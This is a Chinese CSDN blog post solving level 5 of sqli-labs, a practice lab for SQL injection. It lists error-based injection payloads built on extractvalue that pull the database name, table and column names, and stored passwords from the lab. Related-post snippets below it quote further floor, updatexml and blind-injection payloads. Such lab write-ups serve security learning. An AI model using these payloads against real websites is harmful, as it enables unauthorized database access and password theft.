sqli-labs---第五关

已于 2024-05-25 15:08:17 修改
阅读量579 收藏 3
点赞数 21
分类专栏: CTF解题集 文章标签: sql 数据库
于 2024-05-22 11:58:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75556700/article/details/139115543
版权

1、判断注入类型

?id=1(没有正常显示)提示了一串字符

?id=1'(出现了错误提示)

根据页面的提示可以知道这是单引号'的闭合方式,并且是报错注入

2、查询数据库名

?id=1' and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--+

3、查询表名(看到敏感表users)

?id=1' and (extractvalue(1,concat(0x7e,(select table_name) from information_schema.tables where table_schema='security'),0x7e))) --+

4、查询users表中字段的信息

 ?id=1' and (extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),0x7e))) --+

  ?id=1' and (extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),0x7e))) --+

5、查字段password中的值

可能是查询的语句不适合,使用下面的payload,可以查询,如果不加上limit 0,1,查询会超过一行,就会报错limit 表示从0+1个位置开始,显示第一个数据

 ?id=1' and (extractvalue(1,concat(0x7e,(select password from users limit 0,1),0x7e))) --+

  ?id=1' and (extractvalue(1,concat(0x7e,(select password from users limit 1,1),0x7e))) --+

可以根据修改第一个参数的值来显示密码,同理,用户名也一样 

不拿flag不改名
关注
  • 21
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于Sqli-Labs靶场的SQL注入-第五(重点讲双查询注入)
Joker
11-19 4009
双查询是指两个查询语句的嵌套,也就是一个select语句中在去套一个select语句,然后利用group by 语句和floor函数的结合去报错,再将我们需要的信息显示到报错信息中。
sqli-labs-----第五
wyzhxhn的博客
11-06 860
单引号字符型updatexml报错注入
sql-labs 闯 5~10
qq_44663230的博客
08-14 1511
sql-labs 第5~10 盲注系列
sqlilab记(5-6)
qq_30570001的博客
01-20 811
id=1' and (select count(*) from information_schema.tables group by concat(floor(rand(14)*2),0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+拿表名。3、方法一、floor报错注入:?:floor报错原理解析。
sqlilabs第五布尔盲注(burpsuite版)
最新发布
xnxqwzy的博客
04-20 820
一.判断有无注入点及注入类型:id=1​编辑id=1’(这里可以看到页面显示sql语句报错信息,基本可以判定为’闭合)​编辑补全后查看页面效果(1=1时有返回页面,1=2时无返回页面,无报错信息,符合页面布尔类型状态,尝试使用布尔型注入)1.页面没有回显不能用联合查询(order by、union select ),页面没有报错信息不能用报错注入。2.页面布尔类型状态:页面无回显且无报错信息。id=1’ – +​编辑​编辑​编辑猜测数据库长度:(若是猜错,没有返回页面)​编辑。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-lab第5---第10
qq_54037445的博客
10-06 1750
sqli-lab,get类型,时间盲注,布尔盲注,报错注入,详细讲解
sqli-labs 第五
m0_63711447的博客
04-01 4510
第五可以用很多种方法来做,报错型注入,二次查询注入等,这里用布尔盲注手工注入的方法来做 Less -5 1、输入?id=1,显示you are in 将1改为3,5等数字,仍然得相同结果,改为100,发现没有回显,由此可知正确的情况下会返回you are in,错误的情况下没有返回, 输入?id=1',出现报错信息,由此判断存在注入漏洞 2、使用order by 语句进行查列,order by 3的时候正常回显,order by 4无回显,说明有三列 3、对于这题不能使用联合查询,无.
sqli-labs-基于布尔的盲注
zlloveyouforever的博客
04-29 1087
sqli-labs第五--基于布尔的盲注
sqli-labs系列——第五
茶寂的博客
01-15 2275
less5 更改id后无果,不能用union联合查询 此处用报错注入 报错注入的概念: (1). 通过floor报错 and (select 1 from (select count(*),concat(( payload),floor (rand(0)*2))x from information_schema.tables group by x)a) 其中payload为你要插入的SQL语句 需要注意的是该语句将 输出字符长度限制为64个字符 (2). 通过updatexml报错 and update
sqli-labs靶场第五
gou1791241251的博客
12-20 4352
第五与前面几都有所不同,话不多说,我们传入id=1进去看看吧! 此时页面回显信息为you are in… 第一步:判断注入类型,字符型还是数字型 从报错信息不难看出注入类型为字符型,且为单引号闭合 此步证实了单引号闭合 第二步:判断字段数(使用order by) order by 3时页面正常,order by 4时页面异常,说明有三个字段 页面有布尔类型状态,所以用布尔盲注,页面没有回显不能用联合查询,页面没有报错信息不能用报错注入。 使用length函数来判断数据库名长度是否为1,由图可
手把手教你通 SQLi - labs 1~5
在下小黄的博客
09-09 465
Background -1 SQL注入基础知识 Less -1 基于错误的GET单引号字符型注入 手工注入: 代码审计: 检查完源码之后,我们发现这里传递参数的单引号出现了问题,我们可以尝试进行注入。 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_G
sqli-labs系列——第五(二次查询注入)
1匹黑马
04-26 6925
文章目录判断注入什么是二次查询注入rand()函数floor()函数concat()函数group by语句count()函数开始注入exp 判断注入 一开始我以为这是一个常规的sql盲注,操作之后发现事情并没有那么简单,为了方便学习,我直接把sql语句输出出来了: 然后就去看题目名称,Double Injection(双查询注入),就明白怎么回事了。 什么是二次查询注入 双查询注入其实就是一个...
sqli-labs第五(配合布尔盲注以及python脚本))
加油~
05-11 1165
进入第五,正常显示如下:![image.png](https://img-blog.csdnimg.cn/img_convert/fb62cfcc13c424b26cdbc08d0250f9eb.png#clientId=udf7edcfc-d50d-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=864&id=u753066f5&margin=[object Object]&name=
sqli-labs第一详情解答
09-14
对于sqli-labs的第一,我们需要利用SQL注入漏洞来绕过登录验证,以下是详细解答: 1. 打开sqli-labs的网址,进入第一页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在跳转的页面中,我们可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值